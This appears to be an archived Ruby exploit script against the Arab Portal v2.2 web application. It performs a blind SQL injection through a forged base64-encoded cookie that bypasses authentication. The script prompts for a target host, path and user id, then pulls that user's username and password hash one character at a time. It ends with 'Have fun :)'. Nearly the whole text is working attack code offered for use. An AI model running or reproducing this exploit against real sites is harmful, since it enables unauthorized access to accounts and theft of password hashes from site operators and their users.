212 lines
No EOL
5.7 KiB
Ruby
Executable file
212 lines
No EOL
5.7 KiB
Ruby
Executable file
#!/usr/bin/ruby
|
|
|
|
#=============================================#
|
|
# Arab Portal v2.2 Exploit #,
|
|
# Blind SQL Injection / Authentication Bypass #
|
|
# Discovered & written by: Jafer Al-Zidjali #
|
|
# Email: jafer@scorpionds.com #
|
|
# Website: www.scorpionds.com #
|
|
#=============================================#
|
|
|
|
require "net/http"
|
|
require "base64"
|
|
|
|
intro=[
|
|
"+=============================================+",
|
|
"+ Arab Portal v2.2 Exploit +",
|
|
"+ Blind SQL Injection / Authentication Bypass +",
|
|
"+ Discovered & written by: Jafer Al-Zidjali +",
|
|
"+ Email: jafer@scorpionds.com +",
|
|
"+ Website: www.scorpionds.com +",
|
|
"+=============================================+"
|
|
]
|
|
|
|
def print_intro text
|
|
w="|"
|
|
text.each do |str|
|
|
str.scan(/./) do |c|
|
|
STDOUT.flush
|
|
if w=="|"
|
|
print "\b"+c +w
|
|
w="/"
|
|
elsif w=="/"
|
|
print "\b"+c +w
|
|
w="-"
|
|
elsif w=="-"
|
|
print "\b"+c +w
|
|
w="\\"
|
|
else
|
|
print "\b"+c +w
|
|
w="|"
|
|
end
|
|
sleep 0.05
|
|
end
|
|
print "\b "
|
|
puts ""
|
|
end
|
|
end
|
|
|
|
print_intro intro
|
|
|
|
puts "\nEnter host name (e.g. example.com):"
|
|
host=gets.chomp
|
|
|
|
puts "\nEnter script path (e.g. /arabportal/):"
|
|
path=gets.chomp
|
|
|
|
puts "\nEnter userid:"
|
|
userid=gets.chomp
|
|
|
|
puts "\nGetting cookie value..."
|
|
|
|
http = Net::HTTP.new(host, 80)
|
|
|
|
resp= http.get(path)
|
|
cookie = resp.response["set-cookie"]
|
|
|
|
len=cookie.split("; ").length
|
|
max=0
|
|
login_info=""
|
|
|
|
len.times do |count|
|
|
clen=cookie.split("; ")[count].length
|
|
if clen > max then
|
|
max=clen
|
|
login_info=cookie.split("; ")[count]
|
|
end
|
|
end
|
|
|
|
login_info=login_info.split(", ")
|
|
|
|
if login_info[0].length > login_info[1].length
|
|
login_info=login_info[0]
|
|
else
|
|
login_info=login_info[1]
|
|
end
|
|
|
|
login_info=login_info.split("=")[0]
|
|
|
|
puts "Cookie name is: "+login_info
|
|
|
|
puts "\nWhat do you want to do?"
|
|
puts "1. Get username."
|
|
puts "2. Get password hash."
|
|
|
|
opt=gets.chomp
|
|
|
|
if opt=="1"
|
|
unamelen=0
|
|
print "\nGetting username length"
|
|
|
|
20.times do |x|
|
|
stmt="#{userid}"+
|
|
"\x27\x20\x61\x6e\x64\x20\x6c"+
|
|
"\x65\x6e\x67\x74\x68\x28\x75"+
|
|
"\x73\x65\x72\x6e\x61\x6d\x65"+
|
|
"\x29\x3d#{x}\x20\x6f\x72\x20\x27\x27\x3d\x27"
|
|
|
|
shellcode="\x61\x3a\x35\x3a\x7b\x69\x3a\x30"+
|
|
"\x3b\x73\x3a\x31\x30\x3a\x22\x61"+
|
|
"\x72\x61\x62\x70\x6f\x72\x74\x61"+
|
|
"\x6c\x22\x3b\x69\x3a\x31\x3b\x69"+
|
|
"\x3a\x31\x3b\x69\x3a\x32\x3b\x73\x3a"+
|
|
stmt.length.to_s+
|
|
"\x3a\x22"+
|
|
stmt+
|
|
"\x22\x3b\x69\x3a\x33\x3b\x69\x3a"+
|
|
"\x30\x3b\x69\x3a\x34\x3b\x73\x3a"+
|
|
"\x31\x3a\x22\x61\x22\x3b\x7d"
|
|
|
|
header={
|
|
"Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/\s/,"")
|
|
}
|
|
|
|
resp= http.get(path,header)
|
|
if resp.body =~ /action=logout/
|
|
puts "\nLength is: #{x}"
|
|
unamelen=x
|
|
break
|
|
else
|
|
print "."
|
|
STDOUT.flush
|
|
end
|
|
end
|
|
|
|
chars="abcdefghijklmnopqrstuvwxyz0123456789"
|
|
|
|
print "\nGetting username: "
|
|
unamelen.times do |z|
|
|
chars.scan(/./) do |c|
|
|
stmt="#{userid}"+
|
|
"\x27\x20\x61\x6e\x64\x20\x73"+
|
|
"\x75\x62\x73\x74\x72\x69\x6e"+
|
|
"\x67\x28\x75\x73\x65\x72\x6e"+
|
|
"\x61\x6d\x65\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27\x20\x6f\x72\x20\x27\x27\x3d\x27"
|
|
|
|
shellcode="\x61\x3a\x35\x3a\x7b\x69\x3a\x30"+
|
|
"\x3b\x73\x3a\x31\x30\x3a\x22\x61"+
|
|
"\x72\x61\x62\x70\x6f\x72\x74\x61"+
|
|
"\x6c\x22\x3b\x69\x3a\x31\x3b\x69"+
|
|
"\x3a\x31\x3b\x69\x3a\x32\x3b\x73\x3a"+
|
|
stmt.length.to_s+
|
|
"\x3a\x22"+
|
|
stmt+
|
|
"\x22\x3b\x69\x3a\x33\x3b\x69\x3a"+
|
|
"\x30\x3b\x69\x3a\x34\x3b\x73\x3a"+
|
|
"\x31\x3a\x22\x61\x22\x3b\x7d"
|
|
|
|
header={
|
|
"Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/\s/,"")
|
|
}
|
|
print c
|
|
STDOUT.flush
|
|
http = Net::HTTP.new(host, 80)
|
|
resp= http.get(path,header)
|
|
if resp.body =~ /action=logout/
|
|
break
|
|
end
|
|
print "\b"
|
|
end
|
|
end
|
|
puts "\nHave fun :)"
|
|
|
|
elsif opt=="2"
|
|
chars="0123456789abcdef"
|
|
|
|
print "\nGetting password hash: "
|
|
32.times do |z|
|
|
chars.scan(/./) do |c|
|
|
stmt="#{userid}"+
|
|
"\x27\x20\x61\x6e\x64\x20\x73\x75"+
|
|
"\x62\x73\x74\x72\x69\x6e\x67\x28"+
|
|
"\x70\x61\x73\x73\x77\x6f\x72\x64"+
|
|
"\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27"+
|
|
"\x20\x6f\x72\x20\x27\x27\x3d\x27"
|
|
shellcode="\x61\x3a\x35\x3a\x7b\x69\x3a\x30"+
|
|
"\x3b\x73\x3a\x31\x30\x3a\x22\x61"+
|
|
"\x72\x61\x62\x70\x6f\x72\x74\x61"+
|
|
"\x6c\x22\x3b\x69\x3a\x31\x3b\x69"+
|
|
"\x3a\x31\x3b\x69\x3a\x32\x3b\x73\x3a"+
|
|
stmt.length.to_s+
|
|
"\x3a\x22"+
|
|
stmt+
|
|
"\x22\x3b\x69\x3a\x33\x3b\x69\x3a"+
|
|
"\x30\x3b\x69\x3a\x34\x3b\x73\x3a"+
|
|
"\x31\x3a\x22\x61\x22\x3b\x7d"
|
|
header={
|
|
"Cookie" => login_info+"="+Base64.encode64(shellcode).gsub(/\s/,"")
|
|
}
|
|
print c
|
|
STDOUT.flush
|
|
http = Net::HTTP.new(host, 80)
|
|
resp= http.get(path,header)
|
|
if resp.body =~ /action=logout/
|
|
break
|
|
end
|
|
print "\b"
|
|
end
|
|
end
|
|
puts "\nHave fun :)"
|
|
end
|
|
|
|
# milw0rm.com [2009-08-07] |